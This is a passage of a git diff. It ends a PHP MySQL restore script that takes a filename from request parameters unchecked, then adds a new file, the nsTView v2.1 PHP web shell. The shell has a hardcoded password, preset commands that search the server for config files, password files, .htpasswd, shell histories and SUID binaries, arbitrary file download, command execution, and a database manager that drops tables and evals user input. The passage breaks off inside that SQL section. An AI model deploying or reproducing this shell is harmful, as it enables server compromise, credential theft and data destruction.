+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Confirm Restoration</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <strong>Are you sure you want to restore the SQL file?</strong><br /><br />
+                    <a href="$url">Click here to restore "$filename" to "{$this->db['name']}"</a>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+    }
+
+    function do_restore() {
+        global $HTTP_GET_VARS;
+
+        $filename = $HTTP_GET_VARS['filename'];
+        $this->read_db_details();
+        $this->connect();
+
+        $filesize       = filesize($filename);
+        $file_position  = isset($HTTP_GET_VARS['pos']) ? $HTTP_GET_VARS['pos'] : 0;
+        $errors         = isset($HTTP_GET_VARS['ignore_errors']) ? 0 : 1;
+
+        if (!$fp = fopen($filename,'rb')) 
+        {
+        	return $this->error('Unable to open file "'.$filename.'"');
+        }
+
+        $buffer = '';
+        $inside_quote = 0;
+        $quote_inside = '';
+        $started_query = 0;
+
+        $data_buffer = '';
+
+        $last_char = "\n";
+
+        // Sets file position indicator
+        fseek($fp,$file_position);
+
+        while ((!feof($fp) || strlen($buffer)) && !$this->timeout()) 
+        {
+            do 
+            {
+                // Deals with the length of the buffer
+                if (!strlen($buffer)) 
+                {
+                    $buffer .= fread ($fp,1024);
+                }
+
+                // Fiddle around with the buffers
+                $current_char = $buffer[0];
+                $buffer = substr($buffer, 1);
+
+
+                if ($started_query)
+                {
+                    $data_buffer .= $current_char;
+                } 
+                elseif (preg_match("/[A-Za-z]/i",$current_char) && $last_char == "\n") 
+                {
+                    $started_query = 1;
+                    $data_buffer = $current_char;
+                } 
+                else 
+                {
+                    $last_char = $current_char;
+                }
+            } while (!$started_query && (!feof($fp) || strlen($buffer)));
+
+
+            if ($inside_quote && $current_char == $quote_inside && $last_char != '\\') 
+            {
+                // We were inside a quote but now we aren't so reset the flag and carry on
+                $inside_quote = 0;
+            } 
+            elseif ($current_char == '\\' && $last_char == '\\')
+            {
+                $current_char = '';	
+            } 
+            elseif (!$inside_quote && ($current_char == '"' || $current_char == '`' || $current_char == '\''))
+            {
+                // We have just entered a new quote
+                $inside_quote = 1;
+                $quote_inside = $current_char;
+            } 
+            elseif (!$inside_quote && $current_char == ';') 
+            {
+                // End of query so execute query, clear data buffer and advance counter
+                mysql_query($data_buffer);
+
+                if ($errors && mysql_errno())
+                {
+                    $new_position = ftell($fp) - strlen($buffer);
+                    return $this->restore_error($data_buffer, $new_position);
+                }
+
+
+                $data_buffer = '';
+                $last_char = "\n";
+                $started_query = 0;
+            }
+
+            $last_char = $current_char;
+        }
+
+
+        $new_position = ftell($fp) - strlen($buffer) - strlen($data_buffer);
+
+        if (feof($fp)) 
+        {
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Restoration Completed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    The restore progress has finished.
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+        else 
+        {
+            $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename).'&pos='.$new_position;
+
+            if (!$errors) 
+            {
+            	$url .= '&ignore_errors=1';
+            }
+
+            $process = floor(($new_position / $filesize) * 100);
+
+            $this->meta = '<meta http-equiv="refresh" content="5; url='.$url.'">';
+            $this->title = $process.'% Complete';
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Restore in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">
+                        <strong>Restoration is <b>$process%</b> complete.</strong>
+                        <br /><br />
+                        Please await the process of the next batch.
+                        <br /><br />
+                        <a href="$url">Click here if you are not redirected</a>
+                    </div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+
+        fclose($fp);
+       
+    }
+
+    function restore_error($query, $position) {
+        global $HTTP_GET_VARS;
+
+        $filename = $HTTP_GET_VARS['filename'];
+
+        $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename).'&pos='.$position;
+
+        $mysql_error = mysql_error();
+
+        $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="600">
+        <tr>
+          <td align="center" class="title">Query Failed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">
+                        <strong>An error occurred due to an invalid query</strong>
+                        <br /><br />
+                        Query Executed: $query
+                        <br />
+                        MySQL Returned: $mysql_error
+                        <br /><br />
+                        <a href="$url">Continue restore process</a><br />
+                        <a href="{$url}&ignore_errors=1">Continue ignoring all further errors</a><br />
+                    </div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+    }
+    
+}
+
+
+?>
\ No newline at end of file
diff --git a/php/nsTView v2.1.php b/php/nsTView v2.1.php
new file mode 100644
index 0000000..17bd3ac
--- /dev/null
+++ b/php/nsTView v2.1.php	
@@ -0,0 +1,2136 @@
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+error_reporting(E_ALL & ~E_NOTICE);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.1";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView $ver:: nst.void.ru</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.sh311Form.sh3.value+=\" \"+ text;
+document.sh311Form.sh3.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
+if($os=="unix"){
+print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
+}
+print "</td></tr>";
+
+
+
+
+
+if($_GET['p']=="ftp"){
+print "<tr><td>";
+
+
+
+print "</td></tr></table>";
+print $copyr;
+exit;
+}
+
+
+
+
+
+
+
+
+
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
